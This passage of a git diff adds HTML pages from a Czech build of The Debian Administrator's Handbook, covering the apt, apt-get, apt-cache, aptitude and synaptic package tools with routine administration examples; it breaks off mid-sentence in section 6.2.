+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.selinux.html"><strong>Další</strong>14.5. Introduction to SELinux</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-cache.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-cache.html
new file mode 100644
index 000000000..0771997fe
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-cache.html
@@ -0,0 +1,187 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.3. The apt-cache Command</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="sect.apt-get.html"
+        title="6.2. aptitude, apt-get, and apt Commands" /><link
+        rel="next"
+        href="sect.apt-frontends.html"
+        title="6.4. Frontends: aptitude, synaptic" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.apt-cache.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apt-get.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apt-frontends.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.apt-cache"></a>6.3. The <code
+                  class="command">apt-cache</code> Command</h2></div></div></div><a
+          id="id-1.9.12.2"
+          class="indexterm"></a><a
+          id="id-1.9.12.3"
+          class="indexterm"></a><a
+          id="id-1.9.12.4"
+          class="indexterm"></a><a
+          id="id-1.9.12.5"
+          class="indexterm"></a><a
+          id="id-1.9.12.6"
+          class="indexterm"></a><div
+          class="para">
+			The <code
+            class="command">apt-cache</code> command can display much of the information stored in APT's internal database. This information is a sort of cache since it is gathered from the different sources listed in the <code
+            class="filename">sources.list</code> file. This happens during the <code
+            class="command">apt update</code> operation.
+		</div><div
+          class="sidebar"><a
+            xmlns=""
+            id="sidebar.cache"></a><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>VOCABULARY</em></span> Cache</strong></p></div></div></div><div
+            class="para">
+			A cache is a temporary storage system used to speed up frequent data access when the usual access method is expensive (performance-wise). This concept can be applied in numerous situations and at different scales, from the core of microprocessors up to high-end storage systems.
+		</div><div
+            class="para">
+			In the case of APT, the reference <code
+              class="filename">Packages</code> files are those located on Debian mirrors. That said, it would be very ineffective to go through the network for every search that we might want to do in the database of available packages. That is why APT stores a copy of those files (in <code
+              class="filename">/var/lib/apt/lists/</code>) and searches are done within those local files. Similarly, <code
+              class="filename">/var/cache/apt/archives/</code> contains a cache of already downloaded packages to avoid downloading them again if you need to reinstall them after a removal.
+		</div></div><a
+          id="id-1.9.12.9"
+          class="indexterm"></a><a
+          id="id-1.9.12.10"
+          class="indexterm"></a><a
+          id="id-1.9.12.11"
+          class="indexterm"></a><a
+          id="id-1.9.12.12"
+          class="indexterm"></a><a
+          id="id-1.9.12.13"
+          class="indexterm"></a><a
+          id="id-1.9.12.14"
+          class="indexterm"></a><div
+          class="para">
+			The <code
+            class="command">apt-cache</code> command can do keyword-based package searches with <code
+            class="command">apt-cache search <em
+              class="replaceable">keyword</em></code>. It can also display the headers of the package's available versions with <code
+            class="command">apt-cache show <em
+              class="replaceable">package</em></code>. This command provides the package's description, its dependencies, the name of its maintainer, etc. Note that <code
+            class="command">apt search</code>, <code
+            class="command">apt show</code>, <code
+            class="command">aptitude search</code>, <code
+            class="command">aptitude show</code> work in the same way.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> <code
+                      class="command">axi-cache</code></strong></p></div></div></div><a
+            id="id-1.9.12.16.2"
+            class="indexterm"></a><a
+            id="id-1.9.12.16.3"
+            class="indexterm"></a><div
+            class="para">
+			<code
+              class="command">apt-cache search</code> is a very rudimentary tool, basically implementing <code
+              class="command">grep</code> on package's descriptions. It often returns too many results or none at all when you include too many keywords.
+		</div><div
+            class="para">
+			<code
+              class="command">axi-cache search <em
+                class="replaceable">term</em></code>, on the other hand, provides better results, sorted by relevancy. It uses the <span
+              class="emphasis"><em>Xapian</em></span> search engine and is part of the <span
+              class="pkg pkg">apt-xapian-index</span> package whichs indexes all package information (and more, like the <code
+              class="filename">.desktop</code> files from all Debian packages). It knows about tags (see sidebar <a
+              class="xref"
+              href="sect.package-meta-information.html#sidebar.debtags"><span
+                class="emphasis"><em>GOING FURTHER</em></span> The <code
+                class="literal">Tag</code> field</a>) and returns results in a matter of milliseconds.
+		</div><pre
+            class="screen">$ <strong
+              class="userinput"><code>axi-cache search package use::searching</code></strong>
+100 results found.
+Results 1-20:
+100% packagesearch - GUI for searching packages and viewing package information
+100% apt-utils - package management related utility programs
+99% dpkg-awk - Gawk script to parse /var/lib/dpkg/{status,available} and Packages
+98% migemo - Transitional package for migemo
+95% apt-file - search for files within Debian packages (command-line interface)
+[...]
+79% apt-xapian-index - maintenance and search tools for a Xapian index of Debian packages
+More terms: paquets debian pour debtags recherche gift gnuift
+More tags: suite::debian works-with::software:package role::program admin::package-management interface::commandline scope::utility field::biology:bioinformatics
+`axi-cache more' will give more results
+</pre></div><a
+          id="id-1.9.12.17"
+          class="indexterm"></a><a
+          id="id-1.9.12.18"
+          class="indexterm"></a><a
+          id="id-1.9.12.19"
+          class="indexterm"></a><div
+          class="para">
+			Some features are more rarely used. For instance, <code
+            class="command">apt-cache policy</code> displays the priorities of package sources as well as those of individual packages. Another example is <code
+            class="command">apt-cache dumpavail</code> which displays the headers of all available versions of all packages. <code
+            class="command">apt-cache pkgnames</code> displays the list of all the packages which appear at least once in the cache.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apt-get.html"><strong>Předcházející</strong>6.2. aptitude, apt-get, and apt Commands</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apt-frontends.html"><strong>Další</strong>6.4. Frontends: aptitude, synaptic</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-frontends.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-frontends.html
new file mode 100644
index 000000000..4c3143c40
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-frontends.html
@@ -0,0 +1,268 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.4. Frontends: aptitude, synaptic</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="sect.apt-cache.html"
+        title="6.3. The apt-cache Command" /><link
+        rel="next"
+        href="sect.package-authentication.html"
+        title="6.5. Checking Package Authenticity" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.apt-frontends.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apt-cache.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.package-authentication.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.apt-frontends"></a>6.4. Frontends: <code
+                  class="command">aptitude</code>, <code
+                  class="command">synaptic</code></h2></div></div></div><a
+          id="id-1.9.13.2"
+          class="indexterm"></a><a
+          id="id-1.9.13.3"
+          class="indexterm"></a><a
+          id="id-1.9.13.4"
+          class="indexterm"></a><div
+          class="para">
+			APT is a C++ program whose code mainly resides in the <code
+            class="command">libapt-pkg</code> shared library. Using a shared library facilitates the creation of user interfaces (front-ends), since the code contained in the library can easily be reused. Historically, <code
+            class="command">apt-get</code> was only designed as a test front-end for <code
+            class="command">libapt-pkg</code> but its success tends to obscure this fact.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.aptitude"></a>6.4.1. <code
+                    class="command">aptitude</code></h3></div></div></div><div
+            class="para">
+				<code
+              class="command">aptitude</code> is an interactive program that can be used in semi-graphical mode on the console. You can browse the list of installed and available packages, look up all the available information, and select packages to install or remove. The program is designed specifically to be used by administrators, so that its default behaviors are much more intelligent than <code
+              class="command">apt-get</code>'s, and its interface much easier to understand.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.9.13.6.3"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/aptitude.png"
+                  alt="The aptitude package manager" /></div></div><p
+              class="title"><strong>Obrázek 6.1. The <code
+                  class="command">aptitude</code> package manager</strong></p></div><div
+            class="para">
+				When it starts, <code
+              class="command">aptitude</code> shows a list of packages sorted by state (installed, non-installed, or installed but not available on the mirrors — other sections display tasks, virtual packages, and new packages that appeared recently on mirrors). To facilitate thematic browsing, other views are available. In all cases, <code
+              class="command">aptitude</code> displays a list combining categories and packages on the screen. Categories are organized through a tree structure, whose branches can respectively be unfolded or closed with the <span
+              class="keycap"><strong>Enter</strong></span>, <span
+              class="keycap"><strong>[</strong></span> and <span
+              class="keycap"><strong>]</strong></span> keys. <span
+              class="keycap"><strong>+</strong></span> should be used to mark a package for installation, <span
+              class="keycap"><strong>-</strong></span> to mark it for removal and <span
+              class="keycap"><strong>_</strong></span> to purge it (note that these keys can also be used for categories, in which case the corresponding actions will be applied to all the packages of the category). <span
+              class="keycap"><strong>u</strong></span> updates the lists of available packages and <span
+              class="keycap"><strong>Shift</strong></span>+<span
+              class="keycap"><strong>u</strong></span> prepares a global system upgrade. <span
+              class="keycap"><strong>g</strong></span> switches to a summary view of the requested changes (and typing <span
+              class="keycap"><strong>g</strong></span> again will apply the changes), and <span
+              class="keycap"><strong>q</strong></span> quits the current view. If you are in the initial view, this will effectively close <code
+              class="command">aptitude</code>.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>DOCUMENTATION</em></span> <code
+                        class="command">aptitude</code></strong></p></div></div></div><div
+              class="para">
+				This section does not cover the finer details of using <code
+                class="command">aptitude</code>, it rather focuses on giving you a survival kit to use it. <code
+                class="command">aptitude</code> is rather well documented and we advise you to use its complete manual available in the <span
+                class="pkg pkg">aptitude-doc-en</span> package (see <code
+                class="filename">/usr/share/doc/aptitude/html/en/index.html</code>).
+			</div></div><div
+            class="para">
+				To search for a package, you can type <span
+              class="keycap"><strong>/</strong></span> followed by a search pattern. This pattern matches the name of the package, but can also be applied to the description (if preceded by <code
+              class="literal">~d</code>), to the section (with <code
+              class="literal">~s</code>) or to other characteristics detailed in the documentation. The same patterns can filter the list of displayed packages: type the <span
+              class="keycap"><strong>l</strong></span> key (as in <span
+              class="foreignphrase"><em
+                class="foreignphrase">limit</em></span>) and enter the pattern.
+			</div><div
+            class="para">
+				Managing the “automatic flag” of Debian packages (see <a
+              class="xref"
+              href="sect.apt-get.html#sect.automatic-tracking">6.2.7 – „Tracking Automatically Installed Packages“</a>) is a breeze with <code
+              class="command">aptitude</code>. It is possible to browse the list of installed packages and mark packages as automatic with <span
+              class="keycap"><strong>Shift</strong></span>+<span
+              class="keycap"><strong>m</strong></span> or to remove the mark with the <span
+              class="keycap"><strong>m</strong></span> key. “Automatic packages” are displayed with an “A” in the list of packages. This feature also offers a simple way to visualize the packages in use on a machine, without all the libraries and dependencies that you don't really care about. The related pattern that can be used with <span
+              class="keycap"><strong>l</strong></span> (to activate the filter mode) is <code
+              class="literal">~i!~M</code>. It specifies that you only want to see installed packages (<code
+              class="literal">~i</code>) not marked as automatic (<code
+              class="literal">!~M</code>).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> Using <code
+                        class="command">aptitude</code> on the command-line interface</strong></p></div></div></div><div
+              class="para">
+				Most of <code
+                class="command">aptitude</code>'s features are accessible via the interactive interface as well as via command-lines. These command-lines will seem familiar to regular users of <code
+                class="command">apt-get</code> and <code
+                class="command">apt-cache</code>.
+			</div><div
+              class="para">
+				The advanced features of <code
+                class="command">aptitude</code> are also available on the command-line. You can use the same package search patterns as in the interactive version. For example, if you want to cleanup the list of “manually installed” packages, and if you know that none of the locally installed programs require any particular libraries or Perl modules, you can mark the corresponding packages as automatic with a single command:
+			</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>aptitude markauto '~slibs|~sperl'</code></strong></pre><div
+              class="para">
+				Here, you can clearly see the power of the search pattern system of <code
+                class="command">aptitude</code>, which enables the instant selection of all the packages in the <code
+                class="literal">libs</code> and <code
+                class="literal">perl</code> sections.
+			</div><div
+              class="para">
+				Beware, if some packages are marked as automatic and if no other package depends on them, they will be removed immediately (after a confirmation request).
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.13.6.9"></a>6.4.1.1. Managing Recommendations, Suggestions and Tasks</h4></div></div></div><div
+              class="para">
+					Another interesting feature of <code
+                class="command">aptitude</code> is the fact that it respects recommendations between packages while still giving users the choice not to install them on a case by case basis. For example, the <span
+                class="pkg pkg">gnome</span> package recommends <span
+                class="pkg pkg">brasero</span> (among others). When you select the former for installation, the latter will also be selected (and marked as automatic if not already installed on the system). Typing <span
+                class="keycap"><strong>g</strong></span> will make it obvious: <span
+                class="pkg pkg">brasero</span> appears on the summary screen of pending actions in the list of packages installed automatically to satisfy dependencies. However, you can decide not to install it by deselecting it before confirming the operations.
+				</div><div
+              class="para">
+					Note that this recommendation tracking feature does not apply to upgrades. For instance, if a new version of <span
+                class="pkg pkg">gnome</span> recommends a package that it did not recommend formerly, the package won't be marked for installation. However, it will be listed on the upgrade screen so that the administrator can still select it for installation.
+				</div><div
+              class="para">
+					Suggestions between packages are also taken into account, but in a manner adapted to their specific status. For example, since <span
+                class="pkg pkg">gnome</span> suggests <span
+                class="pkg pkg">empathy</span>, the latter will be displayed on the summary screen of pending actions (in the section of packages suggested by other packages). This way, it is visible and the administrator can decide whether to take the suggestion into account or not. Since it is only a suggestion and not a dependency or a recommendation, the package will not be selected automatically — its selection requires a manual intervention from the user (thus, the package will not be marked as automatic).
+				</div><div
+              class="para">
+					In the same spirit, remember that <code
+                class="command">aptitude</code> makes intelligent use of the concept of task. Since tasks are displayed as categories in the screens of packages lists, you can either select a full task for installation or removal, or browse the list of packages included in the task to select a smaller subset.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.13.6.10"></a>6.4.1.2. Better Solver Algorithms</h4></div></div></div><div
+              class="para">
+					To conclude this section, let's note that <code
+                class="command">aptitude</code> has more elaborate algorithms compared to <code
+                class="command">apt-get</code> when it comes to resolving difficult situations. When a set of actions is requested and when these combined actions would lead to an incoherent system, <code
+                class="command">aptitude</code> evaluates several possible scenarios and presents them in order of decreasing relevance. However, these algorithms are not failproof. Fortunately there is always the possibility to manually select the actions to perform. When the currently selected actions lead to contradictions, the upper part of the screen indicates a number of “broken” packages (and you can directly navigate to those packages by pressing <span
+                class="keycap"><strong>b</strong></span>). It is then possible to manually build a solution for the problems found. In particular, you can get access to the different available versions by simply selecting the package with <span
+                class="keycap"><strong>Enter</strong></span>. If the selection of one of these versions solves the problem, you should not hesitate to use the function. When the number of broken packages gets down to zero, you can safely go to the summary screen of pending actions for a last check before you apply them.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NOTE</em></span> <code
+                          class="command">aptitude</code>'s log</strong></p></div></div></div><div
+                class="para">
+					Like <code
+                  class="command">dpkg</code>, <code
+                  class="command">aptitude</code> keeps a trace of executed actions in its logfile (<code
+                  class="filename">/var/log/aptitude</code>). However, since both commands work at a very different level, you cannot find the same information in their respective logfiles. While <code
+                  class="command">dpkg</code> logs all the operations executed on individual packages step by step, <code
+                  class="command">aptitude</code> gives a broader view of high-level operations like a system-wide upgrade.
+				</div><div
+                class="para">
+					Beware, this logfile only contains a summary of operations performed by <code
+                  class="command">aptitude</code>. If other front-ends (or even <code
+                  class="command">dpkg</code> itself) are occasionally used, then <code
+                  class="command">aptitude</code>'s log will only contain a partial view of the operations, so you can't rely on it to build a trustworthy history of the system.
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.13.7"></a>6.4.2. <code
+                    class="command">synaptic</code></h3></div></div></div><div
+            class="para">
+				<code
+              class="command">synaptic</code> is a graphical package manager for Debian which features a clean and efficient graphical interface based on GTK+/GNOME. Its many ready-to-use filters give fast access to newly available packages, installed packages, upgradable packages, obsolete packages and so on. If you browse through these lists, you can select the operations to be done on the packages (install, upgrade, remove, purge); these operations are not performed immediately, but put into a task list. A single click on a button then validates the operations, and they are performed in one go.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.9.13.7.3"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/synaptic.png"
+                  alt="synaptic package manager" /></div></div><p
+              class="title"><strong>Obrázek 6.2. <code
+                  class="command">synaptic</code> package manager</strong></p></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apt-cache.html"><strong>Předcházející</strong>6.3. The apt-cache Command</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.package-authentication.html"><strong>Další</strong>6.5. Checking Package Authenticity</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-get.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-get.html
new file mode 100644
index 000000000..f63b93cdc
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.apt-get.html
@@ -0,0 +1,786 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.2. aptitude, apt-get, and apt Commands</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="next"
+        href="sect.apt-cache.html"
+        title="6.3. The apt-cache Command" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.apt-get.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="apt.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apt-cache.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.apt-get"></a>6.2. <code
+                  class="command">aptitude</code>, <code
+                  class="command">apt-get</code>, and <code
+                  class="command">apt</code> Commands</h2></div></div></div><a
+          id="id-1.9.11.2"
+          class="indexterm"></a><a
+          id="id-1.9.11.3"
+          class="indexterm"></a><a
+          id="id-1.9.11.4"
+          class="indexterm"></a><div
+          class="para">
+			APT is a vast project, whose original plans included a graphical interface. It is based on a library which contains the core application, and <code
+            class="command">apt-get</code> is the first front end — command-line based — which was developed within the project. <code
+            class="command">apt</code> is a second command-line based front end provided by APT which overcomes some design mistakes of <code
+            class="command">apt-get</code>.
+		</div><div
+          class="para">
+			Both tools are built on top of the same library and are thus very close but the default behaviour of <code
+            class="command">apt</code> has been improved for interactive use and to actually do what most users expect. APT's developers reserve the right to change the public interface of this tool to further improve it. On the opposite, the public interface of <code
+            class="command">apt-get</code> is well defined and will not change in any backwards incompatible way. It is thus the tool that you want to use when you need to script package installation requests.
+		</div><div
+          class="para">
+			Numerous other graphical interfaces then appeared as external projects: <code
+            class="command">synaptic</code>, <code
+            class="command">aptitude</code> (which includes both a text mode interface and a graphical one — even if not complete yet), <code
+            class="command">wajig</code>, etc. The most recommended interface, <code
+            class="command">apt</code>, is the one that we will use in the examples given in this section. Note however that <code
+            class="command">apt-get</code> and <code
+            class="command">aptitude</code> have a very similar command line syntax. When there are major differences between <code
+            class="command">apt</code>, <code
+            class="command">apt-get</code> and <code
+            class="command">aptitude</code>, these differences will be detailed.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.11.8"></a>6.2.1. Initialization</h3></div></div></div><div
+            class="para">
+				For any work with APT, the list of available packages needs to be updated; this can be done simply through <code
+              class="command">apt update</code>. Depending on the speed of your connection, the operation can take a while since it involves downloading a certain number of <code
+              class="filename">Packages</code>/<code
+              class="filename">Sources</code>/<code
+              class="filename">Translation-<em
+                class="replaceable">language-code</em></code> files, which have gradually become bigger and bigger as Debian has developed (at least 10 MB of data for the <code
+              class="literal">main</code> section). Of course, installing from a CD-ROM set does not require any downloading — in this case, the operation is very fast.
+			</div><a
+            id="id-1.9.11.8.3"
+            class="indexterm"></a><a
+            id="id-1.9.11.8.4"
+            class="indexterm"></a><a
+            id="id-1.9.11.8.5"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.11.9"></a>6.2.2. Installing and Removing</h3></div></div></div><a
+            id="id-1.9.11.9.2"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.3"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.4"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.5"
+            class="indexterm"></a><div
+            class="para">
+				With APT, packages can be added or removed from the system, respectively with <code
+              class="command">apt install <em
+                class="replaceable">package</em></code> and <code
+              class="command">apt remove <em
+                class="replaceable">package</em></code>. In both cases, APT will automatically install the necessary dependencies or delete the packages which depend on the package that is being removed. The <code
+              class="command">apt purge <em
+                class="replaceable">package</em></code> command involves a complete uninstallation — the configuration files are also deleted.
+			</div><a
+            id="id-1.9.11.9.7"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.8"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.9"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.10"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.11"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.12"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.13"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.14"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.15"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Installing the same selection of packages several times</strong></p></div></div></div><div
+              class="para">
+				It can be useful to systematically install the same list of packages on several computers. This can be done quite easily.
+			</div><div
+              class="para">
+				First, retrieve the list of packages installed on the computer which will serve as the “model” to copy.
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>dpkg --get-selections &gt;pkg-list</code></strong></pre><div
+              class="para">
+				The <code
+                class="filename">pkg-list</code> file then contains the list of installed packages. Next, transfer the <code
+                class="filename">pkg-list</code> file onto the computers you want to update and use the following commands:
+			</div><pre
+              class="screen">## Update dpkg's database of known packages
+# <strong
+                class="userinput"><code>avail=`mktemp`</code></strong>
+# <strong
+                class="userinput"><code>apt-cache dumpavail &gt; "$avail"</code></strong>
+# <strong
+                class="userinput"><code>dpkg --merge-avail "$avail"</code></strong>
+# <strong
+                class="userinput"><code>rm -f "$avail"</code></strong>
+## Update dpkg's selections
+# <strong
+                class="userinput"><code>dpkg --set-selections &lt; pkg-list</code></strong>
+## Ask apt-get to install the selected packages
+# <strong
+                class="userinput"><code>apt-get dselect-upgrade</code></strong></pre><div
+              class="para">
+				The first commands records the list of available packages in the dpkg database, then <code
+                class="command">dpkg --set-selections</code> restores the selection of packages that you wish to install, and the <code
+                class="command">apt-get</code> invocation executes the required operations! <code
+                class="command">aptitude</code> does not have this command.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Removing and installing at the same time</strong></p></div></div></div><div
+              class="para">
+				It is possible to ask <code
+                class="command">apt</code> (or <code
+                class="command">apt-get</code>, or <code
+                class="command">aptitude</code>) to install certain packages and remove others on the same command line by adding a suffix. With an <code
+                class="command">apt install</code> command, add “<code
+                class="literal">-</code>” to the names of the packages you wish to remove. With an <code
+                class="command">apt remove</code> command, add “<code
+                class="literal">+</code>” to the names of the packages you wish to install.
+			</div><div
+              class="para">
+				The next example shows two different ways to install <em
+                class="replaceable">package1</em> and to remove <em
+                class="replaceable">package2</em>.
+			</div><pre
+              class="screen"># <strong
+                class="userinput"><code>apt install <em
+                    class="replaceable">package1</em> <em
+                    class="replaceable">package2-</em></code></strong>
+[...]
+# <strong
+                class="userinput"><code>apt remove <em
+                    class="replaceable">package1+</em> <em
+                    class="replaceable">package2</em></code></strong>
+[...]
+</pre><div
+              class="para">
+				This can also be used to exclude packages which would otherwise be installed, for example due to a <code
